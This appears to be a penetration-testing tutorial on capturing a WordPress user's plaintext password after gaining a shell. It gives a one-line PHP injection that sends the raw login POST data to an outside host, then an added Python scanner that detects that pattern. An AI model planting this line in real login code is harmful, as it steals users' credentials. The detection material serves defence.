It’s a familiar situation: you’ve found some vulnerability and popped a limited shell.
You’ve enumerated services, the kernel, applications, plugins, the distribution, jobs, configs, file permissions and so on, but you can’t find a feasible way to escalate your privileges.
I present the following scenario.
There is a web app on the system and you suspect the system root user (who also uses the web app) suffers from the common (and tempting) affliction of password reuse.
You’ve gained access to the database and dumped the web app root user’s (hashed) password, but you can’t crack it.
So, what can we do?
Intercept the password before it’s hashed.
For this demo we will be using a default WordPress install.
Our first step is to find where authentication is handled:
Once we have identified where the authentication form is processed, we want to hijack the flow of execution and intercept the password before it is hashed and compared against the stored hash in the database.
The file_get_contents function can fetch a resource from an arbitrary domain, while the php://input stream lets us read the raw POST data directly from the request body.
By combining these two we can send the authentication POST data to an arbitrary site before it is hashed (note: this code must be placed in the execution flow where authentication is handled):
file_get_contents("http://rileykidd.com/" . file_get_contents("php://input"));
Next time some user logs in, we will receive the following plain text in our server logs:
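As an added defender-side example (not code from the original post), here is a small Python scanner that flags the injection pattern described above in PHP source: a read of php://input within a few lines of a network fetch whose URL is built dynamically rather than from a fixed literal. The sample PHP below is constructed; the wp-load.php and wp_signon lines are only there to make it resemble a login handler.

```python
import re

# Constructed sample of a PHP login handler with one injected exfiltration line
# (the pattern the post describes: raw POST body appended to a remote URL).
SAMPLE_PHP = """<?php
require_once 'wp-load.php';
$creds = array('user_login' => $_POST['log'], 'user_password' => $_POST['pwd']);
file_get_contents("http://rileykidd.com/" . file_get_contents("php://input"));
$user = wp_signon($creds, false);
"""

# A read of the raw request body.
RAW_BODY = re.compile(r"php://input", re.IGNORECASE)

# A network fetch whose URL is built dynamically: a literal http(s) prefix followed
# by concatenation, a bare variable, or a variable interpolated inside the string.
DYNAMIC_FETCH = re.compile(
    r"\b(?:file_get_contents|fopen|curl_init|curl_setopt)\s*\(\s*"
    r"(?:[\"']https?://[^\"']*[\"']\s*\.|\$\w+|[\"']https?://[^\"']*\$)",
    re.IGNORECASE,
)


def find_exfil_candidates(source: str, window: int = 10):
    """Return (line_no, line) pairs for dynamic remote fetches that sit within
    `window` lines of a php://input read. Either pattern alone is common in
    legitimate code; the combination close together is what warrants review."""
    lines = source.splitlines()
    body_reads = [i for i, line in enumerate(lines) if RAW_BODY.search(line)]
    fetches = [i for i, line in enumerate(lines) if DYNAMIC_FETCH.search(line)]
    hits = set()
    for b in body_reads:
        for f in fetches:
            if abs(b - f) <= window:
                hits.add(f)
    return [(i + 1, lines[i].strip()) for i in sorted(hits)]


if __name__ == "__main__":
    for no, line in find_exfil_candidates(SAMPLE_PHP):
        print(f"line {no}: {line}")
```

For WordPress core files specifically, comparing them against the upstream checksums (for example with wp-cli's `wp core verify-checksums`) catches any modification, not just this pattern.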